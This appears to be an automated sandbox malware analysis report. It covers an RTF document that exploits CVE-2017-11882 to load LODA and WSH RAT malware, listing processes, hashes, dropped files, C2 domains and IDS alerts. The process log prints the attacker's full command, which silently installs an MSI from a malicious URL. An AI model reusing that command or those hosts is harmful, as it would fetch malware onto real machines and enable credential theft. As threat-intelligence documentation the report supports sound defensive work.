File name: sab.doc

Full analysis: https://app.any.run/tasks/210fb06b-e607-4085-806e-94bf92fbae4f
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: June 18, 2019, 18:25:31
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: ole-embedded, exploit, CVE-2017-11882, exe-to-msi, loader, evasion, trojan, loda, stealer
Indicators:
MIME: text/rtf
File info: Rich Text Format data, version 1, unknown character set
MD5: 0251B22F858FCC0CED62B34FDBDA70C9
SHA1: 1CF6D9AF3A06DD37B8E316ACC792B284864F49E8
SHA256: BBEFD3AA4E17E4E4D8DC212AF713F28C101072A37D17894CDC53D589F500C513
SSDEEP: 768:s7Kf2sdrM3xaSybdRZXZWkWZNLekKXw47vm6KE1ml2OsyoFt/xsY58aMmYhd0PhB:sxxQW3ykpeu6K5sv/T59nyXUq5aWmEO

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 272)
    • Uses Microsoft Installer as loader

      • cmd.exe (PID: 2512)
    • Application was dropped or rewritten from another process

      • LBWUVX.exe (PID: 584)
      • kl-plugin.exe (PID: 2116)
      • cmdc.exe (PID: 576)
      • cmdc.exe (PID: 1876)
      • cmdc.exe (PID: 3984)
      • cmdc.exe (PID: 608)
      • cmdc.exe (PID: 1020)
      • cmdc.exe (PID: 3068)
      • cmdc.exe (PID: 3520)
      • cmdc.exe (PID: 3824)
    • Downloads executable files from the Internet

      • msiexec.exe (PID: 1920)
      • wscript.exe (PID: 2272)
    • Changes the autorun value in the registry

      • WScript.exe (PID: 2560)
      • wscript.exe (PID: 3560)
      • wscript.exe (PID: 2272)
    • Writes to a start menu file

      • WScript.exe (PID: 2560)
      • wscript.exe (PID: 3560)
      • wscript.exe (PID: 2272)
    • Connects to CnC server

      • wscript.exe (PID: 2272)
      • MSI172D.tmp (PID: 3276)
    • LODA was detected

      • MSI172D.tmp (PID: 3276)
    • Actions looks like stealing of personal data

      • cmdc.exe (PID: 1876)
      • cmdc.exe (PID: 3068)
    • Stealing of credential data

      • wscript.exe (PID: 2272)
      • cmdc.exe (PID: 1876)
      • cmdc.exe (PID: 3068)
  • SUSPICIOUS

    • Executed via COM

      • EQNEDT32.EXE (PID: 272)
      • EQNEDT32.EXE (PID: 3272)
    • Starts CMD.EXE for commands execution

      • EQNEDT32.EXE (PID: 272)
      • wscript.exe (PID: 2272)
    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 1920)
      • MSI172D.tmp (PID: 3276)
      • wscript.exe (PID: 2272)
    • Drop ExeToMSI Application

      • msiexec.exe (PID: 1920)
    • Executes scripts

      • MSI172D.tmp (PID: 3276)
      • WScript.exe (PID: 2560)
      • wscript.exe (PID: 2272)
    • Uses RUNDLL32.EXE to load library

      • MSI172D.tmp (PID: 3276)
    • Application launched itself

      • WScript.exe (PID: 2560)
      • wscript.exe (PID: 2272)
      • cmdc.exe (PID: 3984)
      • cmdc.exe (PID: 608)
    • Creates files in the user directory

      • MSI172D.tmp (PID: 3276)
      • WScript.exe (PID: 2560)
      • rundll32.exe (PID: 3404)
      • wscript.exe (PID: 3560)
      • wscript.exe (PID: 2272)
      • cmdc.exe (PID: 1876)
      • cmdc.exe (PID: 3068)
    • Reads Internet Cache Settings

      • rundll32.exe (PID: 3404)
    • Uses TASKKILL.EXE to kill process

      • cmd.exe (PID: 1524)
      • cmd.exe (PID: 1080)
      • cmd.exe (PID: 3388)
      • cmd.exe (PID: 1740)
      • cmd.exe (PID: 1824)
      • cmd.exe (PID: 4088)
      • cmd.exe (PID: 760)
    • Loads DLL from Mozilla Firefox

      • cmdc.exe (PID: 1876)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 900)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 900)
    • Application was crashed

      • EQNEDT32.EXE (PID: 272)
    • Writes to a desktop.ini file (may be used to cloak folders)

      • msiexec.exe (PID: 1920)
    • Starts application with an unusual extension

      • msiexec.exe (PID: 1920)
    • Application was dropped or rewritten from another process

      • MSI172D.tmp (PID: 3276)
No Malware configuration.

TRiD
.rtf | Rich Text Format (100)

EXIF (RTF)
Saveprevpict: -
InternalVersionNumber: 57435
CharactersWithSpaces: 113
Characters: 97
Words: 17
Pages: 1
TotalEditTime: 12 minutes
RevisionNumber: 23
ModifyDate: 2018:07:03 09:28:00
CreateDate: 2018:01:23 22:18:00
LastModifiedBy: Richard
Author: obidah qudah
No data.
Total processes: 79
Monitored processes: 36
Malicious processes: 14
Suspicious processes: 0

Behavior graph

Processes shown in the graph (rendered in the full report): winword.exe, eqnedt32.exe, cmd.exe, msiexec.exe, msi172d.tmp (#LODA), lbwuvx.exe, wscript.exe, rundll32.exe, taskkill.exe, kl-plugin.exe, cmdc.exe

Process information

PID 900 | Parent process: explorer.exe
  CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\sab.doc.rtf"
  Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
  User: admin | Company: Microsoft Corporation | Integrity Level: MEDIUM
  Description: Microsoft Word | Version: 14.0.6024.1000

PID 272 | Parent process: svchost.exe
  CMD: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
  Path: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
  User: admin | Company: Design Science, Inc. | Integrity Level: MEDIUM
  Description: Microsoft Equation Editor | Exit code: 0 | Version: 00110900

PID 2512 | Parent process: EQNEDT32.EXE
  CMD: cmd.exe & /C CD C: & msiexec.exe /i http://paroquiadamarinhagrande.pt/app/hmvrch.msi /quiet
  Path: C:\Windows\system32\cmd.exe
  User: admin | Company: Microsoft Corporation | Integrity Level: MEDIUM
  Description: Windows Command Processor | Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID 2896 | Parent process: cmd.exe
  CMD: msiexec.exe /i http://paroquiadamarinhagrande.pt/app/hmvrch.msi /quiet
  Path: C:\Windows\system32\msiexec.exe
  User: admin | Company: Microsoft Corporation | Integrity Level: MEDIUM
  Description: Windows® installer | Version: 5.0.7600.16385 (win7_rtm.090713-1255)

PID 1920 | Parent process: services.exe
  CMD: C:\Windows\system32\msiexec.exe /V
  Path: C:\Windows\system32\msiexec.exe
  User: SYSTEM | Company: Microsoft Corporation | Integrity Level: SYSTEM
  Description: Windows® installer | Version: 5.0.7600.16385 (win7_rtm.090713-1255)

PID 3272 | Parent process: svchost.exe
  CMD: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
  Path: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
  User: admin | Company: Design Science, Inc. | Integrity Level: MEDIUM
  Description: Microsoft Equation Editor | Exit code: 0 | Version: 00110900

PID 3276 | Parent process: msiexec.exe
  CMD: "C:\Windows\Installer\MSI172D.tmp"
  Path: C:\Windows\Installer\MSI172D.tmp
  User: admin | Integrity Level: MEDIUM
  Version: 3, 3, 8, 1

PID 584 | Parent process: MSI172D.tmp
  CMD: "C:\Users\admin\AppData\Local\Temp\LBWUVX.exe"
  Path: C:\Users\admin\AppData\Local\Temp\LBWUVX.exe
  User: admin | Integrity Level: MEDIUM
  Description: VistaTaskDialog | Version: 1.0.8.0

PID 2560 | Parent process: MSI172D.tmp
  CMD: "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\LCRBBE..js"
  Path: C:\Windows\System32\WScript.exe
  User: admin | Company: Microsoft Corporation | Integrity Level: MEDIUM
  Description: Microsoft ® Windows Based Script Host | Exit code: 0 | Version: 5.8.7600.16385

PID 3404 | Parent process: MSI172D.tmp
  CMD: "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\WININET.dll",DispatchAPICall 1
  Path: C:\Windows\system32\rundll32.exe
  User: admin | Company: Microsoft Corporation | Integrity Level: LOW
  Description: Windows host process (Rundll32) | Exit code: 0 | Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Total events: 2 971
Read events: 2 158
Write events: 0
Delete events: 0

Modification events: No data

Executable files: 9
Suspicious files: 2
Text files: 29
Unknown types: 8

Dropped files

PID | Process | Filename | Type | MD5 | SHA256
900 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR140.tmp.cvr | - | - | -
1920 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\~DF879F8D71DF1C4B2C.TMP | - | - | -
3276 | MSI172D.tmp | C:\Users\admin\AppData\Local\Temp\aut17F5.tmp | - | - | -
3276 | MSI172D.tmp | C:\Users\admin\AppData\Local\Temp\aut19DA.tmp | - | - | -
1920 | msiexec.exe | C:\Windows\Installer\MSI1006.tmp | executable | E66120CD6D1D4A2F5432D408CAC8F54C | 6B23E254659C8BF38C99B2A29901622EAD86561F5D6531A0256F0E28D771897D
1920 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\Temporary Internet Files\Content.IE5\LYPIDP41\desktop.ini | ini | 4A3DEB274BB5F0212C2419D3D8D08612 | 2842973D15A14323E08598BE1DFB87E54BF88A76BE8C7BC94C56B079446EDF38
3276 | MSI172D.tmp | C:\Users\admin\AppData\Local\Temp\LCRBBE..js | text | E0B516C28CB1E8B82226E00A2B6A415C | 9EE00CFB9075DB154406CE7E1C656BF0CB2BEBA15527EB443891F7F34BCDDC10
900 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 1C3731FA96EBDD2B59DD9077E7304E50 | 90231EF6597C66760A15F548BBB57E7F36AE0729947BF09439BF18DB568920C7
900 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$ab.doc.rtf | pgc | 56DB8B4E8AD3F2CB18035AEE7532E32C | 4485C166E5187F0F0846568D91167B1CEEBC26269CE0AAF0ACB8A422444EAE18
1920 | msiexec.exe | C:\Windows\Installer\MSI172D.tmp | executable | 04751F2FC3D88A94F6399DE95A0F7191 | F15832D60A36A57603F59BCBF21DE9FA5E7954DB9CABF388AC104B1F7BAF50B3
HTTP(S) requests: 6
TCP/UDP connections: 14
DNS requests: 6
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
2272 | wscript.exe | POST | - | 103.136.43.131:1425 | http://vemvemserver.duckdns.org:1425/is-ready | unknown | - | - | malicious
2272 | wscript.exe | GET | 200 | 172.245.14.10:80 | http://doughnut-snack.live/bpvpl.tar.gz | US | executable | 3.11 Mb | malicious
2272 | wscript.exe | POST | 200 | 103.136.43.131:1425 | http://vemvemserver.duckdns.org:1425/is-ready | unknown | text | 95 b | malicious
2272 | wscript.exe | GET | 200 | 172.245.14.10:80 | http://doughnut-snack.live/mapv.tar.gz | US | executable | 2.42 Mb | malicious
2272 | wscript.exe | GET | 200 | 172.245.14.10:80 | http://doughnut-snack.live/klplu.tar.gz | US | executable | 25.5 Kb | malicious
1920 | msiexec.exe | GET | 200 | 188.93.230.15:80 | http://paroquiadamarinhagrande.pt/app/hmvrch.msi | PT | executable | 1.02 Mb | malicious

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
2272 | wscript.exe | 172.245.14.10:80 | doughnut-snack.live | ColoCrossing | US | malicious
3276 | MSI172D.tmp | 104.25.209.99:443 | ipapi.co | Cloudflare Inc | US | shared
3276 | MSI172D.tmp | 104.25.210.99:443 | ipapi.co | Cloudflare Inc | US | shared
3560 | wscript.exe | 185.247.228.14:7755 | unknownsoft.duckdns.org | - | - | malicious
1920 | msiexec.exe | 188.93.230.15:80 | paroquiadamarinhagrande.pt | Claranet Ltd | PT | malicious
2272 | wscript.exe | 103.136.43.131:1425 | vemvemserver.duckdns.org | - | - | malicious
- | - | 103.136.43.131:3120 | vemvemserver.duckdns.org | - | - | malicious

DNS requests

Domain | IP | Reputation
paroquiadamarinhagrande.pt | 188.93.230.15 | malicious
ipapi.co | 104.25.210.99, 104.25.209.99 | shared
unknownsoft.duckdns.org | 185.247.228.14 | malicious
vemvemserver.duckdns.org | 103.136.43.131 | malicious
doughnut-snack.live | 172.245.14.10 | malicious

Threats

PID | Process | Class | Message
1920 | msiexec.exe | Potential Corporate Privacy Violation | SUSPICIOUS [PTsecurity] Executable application_x-msi Download
1920 | msiexec.exe | Potential Corporate Privacy Violation | POLICY [PTsecurity] Executable application_x-msi Download
1920 | msiexec.exe | Misc activity | SUSPICIOUS [PTsecurity] Executable ExeToMSI Download
- | - | Potential Corporate Privacy Violation | ET POLICY External IP Lookup Domain (ipapi .co in DNS lookup)
- | - | Misc activity | ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
- | - | Misc activity | ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
2272 | wscript.exe | A Network Trojan was detected | ET TROJAN WSHRAT CnC Checkin
2272 | wscript.exe | Generic Protocol Command Decode | SURICATA Applayer Detect protocol only one direction
2272 | wscript.exe | A Network Trojan was detected | ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm Checkin 1
2272 | wscript.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP
3 ETPRO signatures available at the full report
Process | Message
kl-plugin.exe | SetWindowsHookEx WH_KEYBOARD_LL
kl-plugin.exe | SetWindowsHookEx WH_MOUSE_LL
kl-plugin.exe | 06/18/2019 19:26:19>MouseChange: nCode=0, wParam=WM_MOUSEMOVE, x=1129, y=353, mouseData=0, flags=0, dwExtraInfo=0
kl-plugin.exe | 06/18/2019 19:26:19>MouseChange: nCode=0, wParam=WM_MOUSEMOVE, x=807, y=468, mouseData=0, flags=0, dwExtraInfo=0
kl-plugin.exe | 06/18/2019 19:26:19>MouseChange: nCode=0, wParam=WM_MOUSEMOVE, x=811, y=439, mouseData=0, flags=0, dwExtraInfo=0